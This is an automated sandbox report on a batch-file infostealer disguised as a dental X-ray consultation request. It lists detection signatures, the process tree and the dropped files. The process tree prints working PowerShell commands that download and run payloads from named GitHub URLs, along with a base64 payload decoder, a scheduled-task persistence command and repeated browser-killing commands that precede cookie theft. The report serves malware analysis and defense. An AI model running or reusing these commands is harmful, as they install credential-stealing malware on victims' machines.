Analysis

  • max time kernel
    149s
  • max time network
    92s
  • platform
    windows11-21h2_x64
  • resource
    win11-20251223-en
  • resource tags

    arch:x64arch:x86image:win11-20251223-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29/12/2025, 15:51

General

  • Target
    Dental_XRay_Consultation_Request.bat
  • Size 826KB
  • Sample251229-talg4aev2g
  • SHA256 d7232c7414a6a8be4d8b82a0d7374a789e3602e15dae503c2817a95e35f7d4d1
  • MD5 SHA1 SHA512 SSDEEP

Malware Config

Extracted

Language
  • ps1

Source
URLs
  • exe.dropper

    https://github.com/d-t2-8/T1-103125/raw/main/T1.zip

Extracted

Language
  • ps1

Deobfuscated
Source
URLs
  • exe.dropper

    https://github.com/ud-9/T-102825/raw/main/u-p.png

Signatures

  • Badlisted process makes network request 4 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 51 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Kills process with taskkill 12 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dental_XRay_Consultation_Request.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -Command "$b=Get-Content -Raw -Encoding ASCII 'C:\Users\Admin\AppData\Local\Temp\payload.b64'; $bytes=[System.Convert]::FromBase64String($b); [System.IO.File]::WriteAllBytes('C:\Users\Admin\AppData\Local\Temp\payload.bat',$bytes)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5036
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2404
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:2184
      • C:\Windows\system32\schtasks.exe
        schtasks /create /tn "WindowsSecurityTask" /tr "\"C:\Users\Admin\AppData\Local\Temp\WindowSecuriy.bat\"" /sc onlogon /rl highest /f
        2⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3208
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ud-9/T-102825/raw/main/u-p.png', 'C:\Users\Admin\AppData\Local\Temp\\WindowSecuriy.bat');
        2⤵
        • Badlisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2956
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/d-t2-8/T1-103125/raw/main/T1.zip', 'C:\Users\Public\\Desktops.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Public\\Desktops.zip', 'C:\Users\Public\\Desktops'); Start-Sleep -Seconds 1; C:\Users\Public\\Desktops\\python C:\Users\Public\\Desktops\\Lib\\prt.py; del C:\Users\Public\\Desktops.zip"
        2⤵
        • Badlisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1392
        • C:\Users\Public\Desktops\python.exe
          "C:\Users\Public\Desktops\python.exe" C:\Users\Public\\Desktops\\Lib\\prt.py
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3160
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe /T >nul 2>&1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4508
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM chrome.exe /T
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2536
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /F /IM msedge.exe /T >nul 2>&1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2204
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM msedge.exe /T
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2248
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /F /IM brave.exe /T >nul 2>&1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2272
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM brave.exe /T
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:800
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe /T >nul 2>&1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3324
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM chrome.exe /T
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2304
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /F /IM msedge.exe /T >nul 2>&1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1328
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM msedge.exe /T
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4244
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /F /IM brave.exe /T >nul 2>&1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5952
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM brave.exe /T
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5908
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe /T >nul 2>&1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1404
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM chrome.exe /T
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:6136
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /F /IM msedge.exe /T >nul 2>&1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2968
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM msedge.exe /T
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2028
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /F /IM brave.exe /T >nul 2>&1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5944
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM brave.exe /T
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5424
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe /T >nul 2>&1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1540
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM chrome.exe /T
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:6072
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /F /IM msedge.exe /T >nul 2>&1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4672
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM msedge.exe /T
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5368
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /F /IM brave.exe /T >nul 2>&1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2712
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM brave.exe /T
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2380

    Network

          MITRE ATT&CK Enterprise v16

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          powershell.exe.log

          • Path C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          • Size 2KB
          • SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
          • MD5 SHA1 SHA512

          StartupProfileData-NonInteractive

          • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          • Size 1KB
          • SHA256 8ca943c02c163cdf5099c1a6f7795399ec72d9d3520f97e01b2cc3fa5a381d5d
          • MD5 SHA1 SHA512

          Facebook_Cookies.txt

          • Path C:\Users\Admin\AppData\Local\Temp\Browsers Data\Facebook_Cookies.txt
          • Size 38B
          • SHA256 9490175b62f63db2d1838a70165c3cdd4a12aa54019fcd78993b70f4ecd43ae9
          • MD5 SHA1 SHA512

          __PSScriptPolicyTest_mhlpngc3.aie.ps1

          • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mhlpngc3.aie.ps1
          • Size 60B
          • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
          • MD5 SHA1 SHA512

          payload.b64

          • Path C:\Users\Admin\AppData\Local\Temp\payload.b64
          • Size 117KB
          • SHA256 b957d113607d7d3148eaa329bd0adf155fea0d45925106cf054935c4dbf0cf1e
          • MD5 SHA1 SHA512 SSDEEP

          payload.b64

          • Path C:\Users\Admin\AppData\Local\Temp\payload.b64
          • Size 46KB
          • SHA256 9f225b7e9570446b2168dbc9d4d78047383c70e775c2a6299f82fd3d316ec7d4
          • MD5 SHA1 SHA512 SSDEEP

          payload.bat

          • Path C:\Users\Admin\AppData\Local\Temp\payload.bat
          • Size 87KB
          • SHA256 e0235e4a73bfb5e4112ed516a33ad3697b94971e5bdc07b4b5a156885534442d
          • MD5 SHA1 SHA512 SSDEEP

          590aee7bdd69b59b.customDestinations-ms

          • Path C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          • Size 6KB
          • SHA256 daa6b50cf5bebc5886fbdb44af9efea56ec40627530e66340238629d1b2c0bec
          • MD5 SHA1 SHA512 SSDEEP

          590aee7bdd69b59b.customDestinations-ms

          • Path C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          • Size 6KB
          • SHA256 0d60ef1a4b9b8a0b3e7b9e45d0ecf5d1e704320c8a9587d40cc1cc09baeca6dd
          • MD5 SHA1 SHA512 SSDEEP

          _compat_pickle.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\_compat_pickle.cpython-312.pyc
          • Size 7KB
          • SHA256 6aa1a9cc3eec06cac80d371f37c5a015e32090420873add0649031af6e5a695b
          • MD5 SHA1 SHA512 SSDEEP

          ast.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\ast.cpython-312.pyc
          • Size 97KB
          • SHA256 81abbd0101a076f3ed2ddda51c5b87ba105ffaa8d4018d116f40771247fbb539
          • MD5 SHA1 SHA512 SSDEEP

          base64.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\base64.cpython-312.pyc
          • Size 23KB
          • SHA256 b674221063dfc5ead4bd1599065ad7a03fda4ece8427ffca545e21790ad273b3
          • MD5 SHA1 SHA512 SSDEEP

          contextlib.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\contextlib.cpython-312.pyc
          • Size 29KB
          • SHA256 bb2bd68d585c998c44c345b12b19d91a4ba39f5e6236c92e612b88485986d9b2
          • MD5 SHA1 SHA512 SSDEEP

          copyreg.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\copyreg.cpython-312.pyc
          • Size 7KB
          • SHA256 91c77d036ea11082fa5c45aa62679ff413ce79c9df862c35b5f77483db01792d
          • MD5 SHA1 SHA512 SSDEEP

          enum.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\enum.cpython-312.pyc
          • Size 78KB
          • SHA256 d5a57cdf52db285ff0048440d8cf4f79666ff98d0727d7aaf4631a6e997bd3c0
          • MD5 SHA1 SHA512 SSDEEP

          functools.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\functools.cpython-312.pyc
          • Size 39KB
          • SHA256 f5b494a56c34da4d714da6e8c259b294dc2706bbf514a37d83447e9b90805cf0
          • MD5 SHA1 SHA512 SSDEEP

          keyword.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\keyword.cpython-312.pyc
          • Size 1KB
          • SHA256 77ed2d7b2ed50f2e4ba1961bdd02a3252be004640ee68fa921a714ad2393c334
          • MD5 SHA1 SHA512

          operator.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\operator.cpython-312.pyc
          • Size 16KB
          • SHA256 bc1b612be010a90caa93c09e46c396c364e73656e8baaef667b1fae38129dde4
          • MD5 SHA1 SHA512 SSDEEP

          pickle.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\pickle.cpython-312.pyc
          • Size 75KB
          • SHA256 3650e0a606009bc8b6c829430804fcf791893af296ff43c6b444dd366ef8be62
          • MD5 SHA1 SHA512 SSDEEP

          reprlib.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\reprlib.cpython-312.pyc
          • Size 9KB
          • SHA256 488c7f84c1c2746682b60ae1576ac10325d4b215dd8512fc5b714570fb4abd48
          • MD5 SHA1 SHA512 SSDEEP

          struct.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\struct.cpython-312.pyc
          • Size 357B
          • SHA256 4b6688ab043d3f086df4ba1e550f280a1c9b46dbeee92d0d16776455b2d0c052
          • MD5 SHA1 SHA512

          types.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\__pycache__\types.cpython-312.pyc
          • Size 14KB
          • SHA256 46a1937b0602e726fae8ae3ba444ef5f143fc1161a7ea4be17b8c52506485c64
          • MD5 SHA1 SHA512 SSDEEP

          _compat_pickle.py

          • Path C:\Users\Public\Desktops\Lib\_compat_pickle.py
          • Size 8KB
          • SHA256 10c81e8803cffaac8bdf085cd01ea948c3adfa32263b2d452bafd5b5519410f6
          • MD5 SHA1 SHA512 SSDEEP

          ast.py

          • Path C:\Users\Public\Desktops\Lib\ast.py
          • Size 64KB
          • SHA256 a3cc2501761596db13cdc84f085dd2736e5c352b51f39f26bdd2407d99dfbb72
          • MD5 SHA1 SHA512 SSDEEP

          base64.py

          • Path C:\Users\Public\Desktops\Lib\base64.py
          • Size 20KB
          • SHA256 366e287224862a59d1416aa17b2259827d46a55c8406ae3f178f9ee7dc3c6f5a
          • MD5 SHA1 SHA512 SSDEEP

          __init__.py

          • Path C:\Users\Public\Desktops\Lib\collections\__init__.py
          • Size 52KB
          • SHA256 1eb4c4445883fd706016aca377d9e5c378bac0412d7c9b20f71cae695d6bb656
          • MD5 SHA1 SHA512 SSDEEP

          __init__.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\collections\__pycache__\__init__.cpython-312.pyc
          • Size 71KB
          • SHA256 9d4767a4885c79ef285480acd54fbff54c31b8f9ae61a57f1e8dbeeda31ecd29
          • MD5 SHA1 SHA512 SSDEEP

          contextlib.py

          • Path C:\Users\Public\Desktops\Lib\contextlib.py
          • Size 27KB
          • SHA256 a53b1db774f19c6b1e4320c2bc64058c49e3fba58b20b9c1158e5a8d02069890
          • MD5 SHA1 SHA512 SSDEEP

          copyreg.py

          • Path C:\Users\Public\Desktops\Lib\copyreg.py
          • Size 7KB
          • SHA256 ea2363638fe83e8e5b007013a821841371a615d99414b3c2f8f19152ca109a07
          • MD5 SHA1 SHA512 SSDEEP

          __init__.py

          • Path C:\Users\Public\Desktops\Lib\encodings\__init__.py
          • Size 5KB
          • SHA256 8b997e9f7beef09de01c34ac34191866d3ab25e17164e08f411940b070bc3e74
          • MD5 SHA1 SHA512 SSDEEP

          __init__.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\encodings\__pycache__\__init__.cpython-312.pyc
          • Size 5KB
          • SHA256 395a717f2d6079487b6eb99f0fe0a1cd84c0e3eb15a2fc3573a3f1663853f978
          • MD5 SHA1 SHA512 SSDEEP

          aliases.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\encodings\__pycache__\aliases.cpython-312.pyc
          • Size 12KB
          • SHA256 7bca95a30ab821e90ed970ded8fe6b143dcb6bbc8f6f8ba0f78fae92b46883d4
          • MD5 SHA1 SHA512 SSDEEP

          cp1252.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\encodings\__pycache__\cp1252.cpython-312.pyc
          • Size 3KB
          • SHA256 78ab563a36710486eeb17fda9c2278273dc3825a4c0540eb8dd7d7cbb706b36e
          • MD5 SHA1 SHA512

          utf_8.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\encodings\__pycache__\utf_8.cpython-312.pyc
          • Size 2KB
          • SHA256 1b7593ee3aa0831ef1b4c535cd685bfb1d463aa1f847c671926c13226b657ae6
          • MD5 SHA1 SHA512

          utf_8_sig.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\encodings\__pycache__\utf_8_sig.cpython-312.pyc
          • Size 6KB
          • SHA256 788b92f51405c0033ddb5ba82de3e7e8800d44472d4aa6624ff8e0eee54582c8
          • MD5 SHA1 SHA512 SSDEEP

          aliases.py

          • Path C:\Users\Public\Desktops\Lib\encodings\aliases.py
          • Size 15KB
          • SHA256 1893cfb597bc5eafd38ef03ac85d8874620112514eb42660408811929cc0d6f8
          • MD5 SHA1 SHA512 SSDEEP

          cp1252.py

          • Path C:\Users\Public\Desktops\Lib\encodings\cp1252.py
          • Size 13KB
          • SHA256 7acb7b80c29d9ffda0fe79540509439537216df3a259973d54e1fb23c34e7519
          • MD5 SHA1 SHA512 SSDEEP

          utf_8.py

          • Path C:\Users\Public\Desktops\Lib\encodings\utf_8.py
          • Size 1KB
          • SHA256 9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e
          • MD5 SHA1 SHA512

          utf_8_sig.py

          • Path C:\Users\Public\Desktops\Lib\encodings\utf_8_sig.py
          • Size 4KB
          • SHA256 21a95bb95448f2f064f08aa2c89e843b87a20a5a13c45c6c47c288f2be5219a4
          • MD5 SHA1 SHA512 SSDEEP

          enum.py

          • Path C:\Users\Public\Desktops\Lib\enum.py
          • Size 81KB
          • SHA256 9d1b2f7dd26000e03c483bc381c1af20395a3ac25c5fd988fbed742cd5278c9a
          • MD5 SHA1 SHA512 SSDEEP

          functools.py

          • Path C:\Users\Public\Desktops\Lib\functools.py
          • Size 37KB
          • SHA256 34c50ab0a64a947b8bade0dc024e4832cf622b4320ddf0e9ef5775ac9f52fab1
          • MD5 SHA1 SHA512 SSDEEP

          keyword.py

          • Path C:\Users\Public\Desktops\Lib\keyword.py
          • Size 1KB
          • SHA256 1f28f509383273238ad86eda04a96343fa0dc10eeaf3189439959d75cdac0a0b
          • MD5 SHA1 SHA512

          operator.py

          • Path C:\Users\Public\Desktops\Lib\operator.py
          • Size 11KB
          • SHA256 c57b6816cfddfa6e4a126583fca0a2563234018daec2cfb9b5142d855546955c
          • MD5 SHA1 SHA512 SSDEEP

          pickle.py

          • Path C:\Users\Public\Desktops\Lib\pickle.py
          • Size 67KB
          • SHA256 df3e61807e3435ff88ef445458d4bdd62ec0924f87256cc51cbd4b0c477b9dcf
          • MD5 SHA1 SHA512 SSDEEP

          prt.py

          • Path C:\Users\Public\Desktops\Lib\prt.py
          • Size 7.6MB
          • SHA256 f1376c7d5250976b7b87250975d9a97ac8109c5920388d95cb35ae9fcb8806cd
          • MD5 SHA1 SHA512 SSDEEP

          __init__.py

          • Path C:\Users\Public\Desktops\Lib\re\__init__.py
          • Size 16KB
          • SHA256 778cdca1fe51cddb7671d7a158c6bdecee1b7967e9f4a0ddf41cfb5320568c42
          • MD5 SHA1 SHA512 SSDEEP

          __init__.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\re\__pycache__\__init__.cpython-312.pyc
          • Size 17KB
          • SHA256 23fc62101621a3a578cf3648884b2c88126f7c1aa0c935031596b5ab517a94f1
          • MD5 SHA1 SHA512 SSDEEP

          _casefix.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\re\__pycache__\_casefix.cpython-312.pyc
          • Size 1KB
          • SHA256 8cecba643e90d33aa68986682a390e7032964883ae0a13ad8c4610cc68f59df3
          • MD5 SHA1 SHA512

          _compiler.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\re\__pycache__\_compiler.cpython-312.pyc
          • Size 25KB
          • SHA256 0592ae9ec75102a3cde264b230385a7bcd5f2b7290230988838d737f154548c8
          • MD5 SHA1 SHA512 SSDEEP

          _constants.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\re\__pycache__\_constants.cpython-312.pyc
          • Size 5KB
          • SHA256 cf42dea952515c1c1ce3c80b3ea00c4f13a78b9efc961f51208fed2834362b44
          • MD5 SHA1 SHA512 SSDEEP

          _parser.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\re\__pycache__\_parser.cpython-312.pyc
          • Size 40KB
          • SHA256 c9e157749e2138a1a4c0dd8fa1fb4696c29b2e1b29ec9ebed4d61a12aa293de5
          • MD5 SHA1 SHA512 SSDEEP

          _casefix.py

          • Path C:\Users\Public\Desktops\Lib\re\_casefix.py
          • Size 5KB
          • SHA256 b0dee234e5f8096fc9c1b035ec52d0b1b50cc1f3aea20b360b8be902e53ac752
          • MD5 SHA1 SHA512 SSDEEP

          _compiler.py

          • Path C:\Users\Public\Desktops\Lib\re\_compiler.py
          • Size 26KB
          • SHA256 7151ee39cffc73db023430de5d6d8f13bc8244255c831d5c2934fccc991ca5e0
          • MD5 SHA1 SHA512 SSDEEP

          _constants.py

          • Path C:\Users\Public\Desktops\Lib\re\_constants.py
          • Size 6KB
          • SHA256 8df304954ca75dcd98b9f1f5e3cb5347adc6eaccfc461a94ab914e1b0085e9ab
          • MD5 SHA1 SHA512 SSDEEP

          _parser.py

          • Path C:\Users\Public\Desktops\Lib\re\_parser.py
          • Size 41KB
          • SHA256 bcc84f06d54e2d28506350a60bc1aaaa0efda4221f4ceeb05b2d0f48c712c479
          • MD5 SHA1 SHA512 SSDEEP

          reprlib.py

          • Path C:\Users\Public\Desktops\Lib\reprlib.py
          • Size 6KB
          • SHA256 354fd4471a2d8c5972e67a38a8eb40040f12bd9b6acd260a889efed250770f0b
          • MD5 SHA1 SHA512 SSDEEP

          __init__.py

          • Path C:\Users\Public\Desktops\Lib\site-packages\Crypto\__init__.py
          • Size 191B
          • SHA256 080587f7e7e526e6a975fade2bb27ca6200a0dd830254fdd0f1c036e16fc857d
          • MD5 SHA1 SHA512

          __init__.py

          • Path C:\Users\Public\Desktops\Lib\site-packages\cryptography\hazmat\primitives\asymmetric\__init__.py
          • Size 180B
          • SHA256 b3da0a090db2705757a0445d4b58a669fb9e4a406c2fd92f6f27e085a6ae67d6
          • MD5 SHA1 SHA512

          __init__.py

          • Path C:\Users\Public\Desktops\Lib\site-packages\pyasn1\codec\der\__init__.py
          • Size 59B
          • SHA256 1040e52584b5ef6107dfd19489d37ff056e435c598f4e555f1edf4015e7ca67d
          • MD5 SHA1 SHA512

          pywin32.pth

          • Path C:\Users\Public\Desktops\Lib\site-packages\pywin32.pth
          • Size 185B
          • SHA256 d902584a2a0a5216ce12c712d1378fe07541d32c383d0cc5abcd68412144fe4d
          • MD5 SHA1 SHA512

          pywin32_bootstrap.cpython-312.pyc

          • Path C:\Users\Public\Desktops\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-312.pyc
          • Size 543B
          • SHA256 b8bb430943de95996e87c301f2cd8e033cb219c5f84ee3fc6ff3ba9f43822319
          • MD5 SHA1 SHA512

          pywin32_bootstrap.py

          • Path C:\Users\Public\Desktops\Lib\site-packages\win32\lib\pywin32_bootstrap.py
          • Size 772B
          • SHA256 fd31f27bc85a6b9c974670838b6eefafb32991be4a9f840f96a4f5524df3b3c3
          • MD5 SHA1 SHA512

          struct.py

          • Path C:\Users\Public\Desktops\Lib\struct.py
          • Size 272B
          • SHA256 eadbcc540c3b6496e52449e712eca3694e31e1d935af0f1e26cff0e3cc370945
          • MD5 SHA1 SHA512

          types.py

          • Path C:\Users\Public\Desktops\Lib\types.py
          • Size 11KB
          • SHA256 d7ce485ecd8d4d1531d8f710e538b4d1a49378afacb6ff9231e48c645a9fa95e
          • MD5 SHA1 SHA512 SSDEEP

          python.exe

          • Path C:\Users\Public\Desktops\python.exe
          • Size 101KB
          • SHA256 737a7e3b71e3578f8432acc7dd88c452e593622c544bc13da4789d69c63da5ae
          • MD5 SHA1 SHA512 SSDEEP

          python312.dll

          • Path C:\Users\Public\Desktops\python312.dll
          • Size 6.6MB
          • SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
          • MD5 SHA1 SHA512 SSDEEP

          vcruntime140.dll

          • Path C:\Users\Public\Desktops\vcruntime140.dll
          • Size 116KB
          • SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
          • MD5 SHA1 SHA512 SSDEEP

          memory/1392-58-0x000002DCB18A0000-0x000002DCB18B2000-memory.dmp

          memory/1392-57-0x000002DCB1870000-0x000002DCB187A000-memory.dmp

          memory/5036-26-0x0000020B7D090000-0x0000020B7D0A0000-memory.dmp

          memory/5036-25-0x0000020B7B320000-0x0000020B7B342000-memory.dmp

          memory/5036-17-0x0000020B7D090000-0x0000020B7D0A0000-memory.dmp

          memory/5036-18-0x0000020B7D090000-0x0000020B7D0A0000-memory.dmp